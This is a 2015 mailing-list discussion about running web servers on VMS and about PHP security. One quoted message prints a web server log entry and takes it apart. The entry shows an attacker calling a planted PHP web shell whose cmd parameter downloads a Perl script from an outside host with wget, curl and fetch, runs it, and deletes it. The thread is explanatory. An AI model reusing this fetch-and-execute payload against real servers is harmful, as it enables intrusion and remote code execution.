[Info-vax] Using VMS for a web server

Tue Jun 9 20:31:25 EDT 2015

Jan-Erik Soderholm wrote:
> Bill Gunshannon skrev den 2015-06-09 16:49:
>> In article <ml6qf1$d82$1 at news.albasani.net>,
>>     Jan-Erik Soderholm <jan-erik.soderholm at telia.com> writes:
>>>
>>>
>>> It would be nice to have a reproducer and test it out.
>>> Or at least a pointer to a description.
>>>
>> ....
>>>
>>> OK. I have only read quite a lot about PHP and it's "problems"
>>> but never used it or had it installed on any server.
>>>
>>> But it would surprice me *a lot* if there wasn't an available
>>> fix for a simple URL based exploit...
>>
>> OK, I wasn't busy (some of these updates are like watching paint dry!)
>> so here is just one to look at.
>>
>> First, a log entry (sanatized a bit as I don't really need someone else
>> trying this):
>>
>> 103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET 
>> /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* 
>> HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; 
>> rv:1.9.2) Gecko/20100115 Firefox/3.6"
>>
>>
>> Now, let's pull out the applicable part:
>>
>> "GET 
>> /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* 
>> HTTP/1.1"
>>
>> Now we analyze it:
>>
>> "GET 
>> /xxxxxxxxxx/xxxxxxx/revslider/temp/update_extract/revslider/XXXXXX.php
>>
>> There is a request to get a PHP script.
>>
>> Note immedately after this part is "?cmd="        Hmmmmmm......
>>
>> And what is the command?
>>
>> wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.c 
>>
>> o.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt; 
>>
>> rm%20-rf%20qtalk.txt*
>>
>> And if we break it down:
>>
>> wget%20http://identerprise.co.kr/css/qtalk.txt;
>>
>> curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;
>>
>> fetch%20http://identerprise.co.kr/css/b.txt;
>>
>> perl%20qtalk.txt;
>>
>> rm%20-rf%20qtalk.txt*
>>
>>
>> So, the attacker uses a hole in PHP to download a Perl script, using 
>> three
>> common ways of doing it (I don't know if any of these are available on 
>> VMS
>> but I suspect curl or wget might be).  He then runs it.  And when he 
>> is done
>> he cleans up his tracks.
>>
>> What does it do?  No idea.  The point is to show something that PHP 
>> allows
>> as a "feature" that makes it probably the worst possible web scripting
>> language.
>>
>> I have seen this method used to download a telnet daemon written in 
>> either
>> PHP or Perl.  This allows outsiders who do not have an account on a 
>> system
>> to get in for a look around.  Good way to look security shortcomings.
>>
>> bill
>>
> 
> OK. That needs a script called wawalo.php already beeing on the server
> in a directory where the server can execute it. The exploit is realy
> to be able to upload the wawalo.php file in the first place.
> 
> If you have a server setup where someone can both upload a random
> file and then also execute that file just like that frm the same
> directory, you have a severe problem.
> 
> Now, is this a "hole in PHP"? Or could the same thing be done
> using any tool that can take an input parameter and execute it?
> 
> I guess any scripting tool could be used to write such a script.
> Many scripting languages are able to take a string and execute it.
> 
> Can this be done on an WASD/VMS server? Not if you do not have
> file upload enabled, at least. And you also need execute rights
> on the upload directory. You can also set it up so thet PHP
> script can only be executed from a safe "script" directory
> with no external write access.
> 
> But again, is it realy a "hole in PHP" ?? I'm not sure...
> 
> 
> Jan-Erik.
> 

As usual, there is a minimum of two sides to just about anything.

Now, Jan-Erik, you understand about execute rights, file uploads, and 
other stuff.  So, used in the manner you want it to work, maybe not such 
a bad thing.  Capabilities are not bad, usage of them can be bad.

On the other hand, what about high school sophmore consultant?

Oh, sure, just put PHP on the system, you'll like it ....

File downloads, you got this web server for people to do stuff on your 
system, right ....

Don't worry, everybody runs it like this ....